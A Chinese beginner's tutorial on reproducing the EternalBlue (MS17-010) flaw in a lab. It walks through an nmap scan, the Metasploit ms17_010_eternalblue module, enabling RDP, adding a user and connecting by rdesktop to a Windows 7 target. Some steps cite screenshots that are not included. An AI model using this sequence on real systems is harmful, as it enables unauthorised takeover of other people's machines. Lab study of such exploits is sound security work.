永恒之蓝，【17-010】漏洞复现，实现远程桌面连接，超详细步骤，小白必看

1、你要找到自己要攻击的靶机的ip(win7或者win2008)

2、进行nmap扫描（攻击机kali）

我这里靶机是win7，可以看到445端口是开着的，那我们就可以开始攻击了

3、打开msfconsole，攻击模块

4、用search查找17-010

5、进入这个漏洞：use exploit/windows/smb/ms17_010_eternalblue

6、进入后先：show options（查看要设置的参数）

7、设置参数

8、show targets （查看可攻击的系统）

9、我前边说了，我的靶机是win7，这里选择系统也是选择win7，设置的时候只用选择前边的ID就可以了

10、设置好了我们输入：run（跑一下）

11、我们功进来了就先提权，输入：getuid（拿到“SYSTEM ”权限）

12、开启远程桌面：meterpreter > run post/windows/manage/enable_rdp

13、输入：shell，进入dos命令下，进入后再在输入：chcp 65001（取消乱码）

14、创建用户，和把用户添加到组里下图非常详细，直接按步骤输入就行了

15、ctrl+shift=T新建一个终端连接远程桌面，输入：rdesktop 192.168.1.40